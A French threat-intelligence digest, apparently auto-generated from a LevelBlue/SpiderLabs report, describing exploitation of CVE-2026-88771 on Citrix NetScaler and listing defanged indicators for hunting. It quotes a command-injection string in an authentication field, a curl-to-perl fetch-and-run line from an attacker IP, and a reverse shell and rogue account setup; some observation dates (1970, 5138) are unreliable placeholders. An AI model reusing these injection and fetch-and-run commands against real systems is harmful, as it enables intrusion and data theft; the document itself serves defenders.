gringao.
Le journal de
ToutEtRien
Le carnet · 8 octobre 2026

Exploitation de CVE‑2026‑88771 sur Citrix NetScaler

REX Cyber · Veille du 2026-10-01. Faits attribués à LevelBlue / SpiderLabs.

Des attaques de command‑injection ont été détectées via des champs d’authentification contenant des chaînes malveillantes. Les attaquants ont exécuté des commandes, récupéré des payloads, collecté des configurations, déployé des shells web et tenté l’exfiltration.

Ce qui s’est passé

  • Entrée : champ d’authentification contenant « pitboss PPE unexpectedly died NSPPE;whoami;# X ». Charge : exécution de whoami pour valider l’injection. Méthode : injection de commandes dans la requête d’authentification. Persistance : aucune. Objectif : tester la vulnérabilité.
  • Charge : récupération d’un script Perl via curl, pipe vers perl. Méthode : curl hxxp://64.94.85[.]67:443/update_c08937.pl | perl. Persistance : script modifie /flash/nsconfig/ns.conf, crée compte sec_monitor, déploie web‑shell. Objectif : obtenir accès privilégié et exfiltrer configuration.
  • Charge : écriture d’un fichier customsnmpd sur /var/python/bin/customsnmpd via main.py. Méthode : main.py remplace le fichier, crée reverse‑shell vers 45.141.21[.]130:443. Persistance : processus customsnmpd persiste. Objectif : maintenir accès à distance.

Acteurs et cibles

Acteurs rapportés

Non précisés dans les données de ce rapport.

Cibles rapportées

Non précisés dans les données de ce rapport.

Vulnérabilités associées dans les données

CVE-2026-88771

Ces associations de renseignement ne prouvent pas que chaque vulnérabilité a été exploitée dans cet incident. Le déroulé ci-dessus précise les faits rapportés par la source.

MITRE ATT&CK

Techniques directement associées au rapport

Aucune technique MITRE structurée directement associée à ce rapport dans les données disponibles.

Les identifiants proviennent des objets de renseignement. Les champs absents sont signalés ; aucune technique n’est ajoutée par déduction du texte.

Entités et contexte du rapport

  • Malware : main.py ; is_family : False ; confiance : 50/100 ; première observation déclarée : 1970-01-01T00:00:00.000Z ; dernière observation déclarée : 5138-11-16T09:46:40.000Z
  • Vulnérabilité : CVE-2026-88771 ; confiance : 80/100
  • Malware : update_c08937.pl ; is_family : False ; confiance : 50/100 ; première observation déclarée : 1970-01-01T00:00:00.000Z ; dernière observation déclarée : 5138-11-16T09:46:40.000Z

Cette liste présente les objets associés par la source. La présence d’un pays, d’un secteur, d’un outil ou d’une CVE ne suffit pas à établir son rôle dans le cas. Les acteurs et les cibles confirmés par le récit sont précisés plus haut.

Relations entre les entités nommées

Origine Relation déclarée Destination Confiance / statut
update_c08937.pl cible CVE-2026-88771 50/100
main.py cible CVE-2026-88771 50/100

IOC et observables pour la recherche

10 valeurs typées issues des objets publics du rapport. Les valeurs ci-dessous sont neutralisées pour éviter les liens actifs. L’export CSV conserve les valeurs exactes.

Statuts de validité calculés au 2026-10-08T07:51:50+00:00, à partir du snapshot collecté. Ils doivent être réévalués avant un usage opérationnel ultérieur.

La confiance est le score de la source sur 100 ; elle n’est pas une probabilité de compromission.

Type Valeur neutralisée Qualification Confiance Usage / validité
ipv4 173[.]40[.]135[.]209 Indicateur 50 Dans la période de validité déclarée
ipv4 31[.]56[.]197[.]72 Indicateur 50 Dans la période de validité déclarée
ipv4 45[.]141[.]21[.]130 Indicateur 50 Révoqué — recherche historique
ipv4 47[.]230[.]224[.]154 Indicateur 50 Dans la période de validité déclarée
ipv4 62[.]133[.]62[.]80 Indicateur 50 Dans la période de validité déclarée
ipv4 70[.]172[.]58[.]168 Indicateur 50 Dans la période de validité déclarée
sha256 974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938 Indicateur 50 Dans la période de validité déclarée
sha256 e9fe43968c6c0955300e3bc4d7fb0b05a18570b4733aaf4f5c6f7f09be5a242c Indicateur 50 Dans la période de validité déclarée
url hxxp[:]//64[.]94[.]85[.]67[:]443/update_c08937[.]pl Indicateur 50 Dans la période de validité déclarée
url hxxp[:]//64[.]94[.]85[.]67[:]443/update_result_3567cs[.]tgz Indicateur 50 Dans la période de validité déclarée

Télécharger les IOC en CSV · Lire les IOC neutralisés (TXT) · Télécharger les renseignements structurés (JSON)

Comment utiliser les exports

Le CSV sert à rechercher les valeurs dans les journaux DNS, proxy, réseau et EDR selon leur type. La présence d’un observable dans un rapport ne suffit pas à justifier son blocage. Les indicateurs révoqués ou expirés sont conservés pour la recherche historique, avec leur statut.

Couverture et provenance

Rapport publié le 2026-10-01T04:55:57.380Z ; 23 objets publics et 32 relations publiques explicitement associées. Pagination complète. Une entité mentionnée n’établit pas, à elle seule, une attribution ou un ciblage. La fiche est générée automatiquement depuis les données du rapport et ses références publiques ; elle ne décrit pas un incident observé chez Gringao.

  • Titre source : Citrix NetScaler CVE-2026-88771: Observed Exploitation Artifacts and Hunt Indicators
  • Types de rapport : threat-report
  • Labels : citrix netscaler, command-injection, configuration-exfiltration, credential-creation, cve-2026-88771, main.py, pre-authentication, reverse-shell, update_c08937.pl, web-shell
  • Confiance du rapport : 50/100
  • Création déclarée par la source : 2026-10-01T04:55:57.380Z
  • Modification déclarée par la source : 2026-10-03T00:48:37.692Z
  • Import de l’objet de renseignement : 2026-10-01T08:09:51.009Z
  • Mise à jour de l’objet de renseignement : 2026-10-03T00:48:37.692Z

Le JSON rassemble les métadonnées, les alias, les attributs structurés, les références, les relations, les techniques MITRE et tous les IOC retenus. Les dates d’import et de mise à jour sont distinctes de la date d’incident.

Source

Citrix NetScaler CVE-2026-88771: Observed Exploitation Artifacts and Hunt Indicators — LevelBlue / SpiderLabs.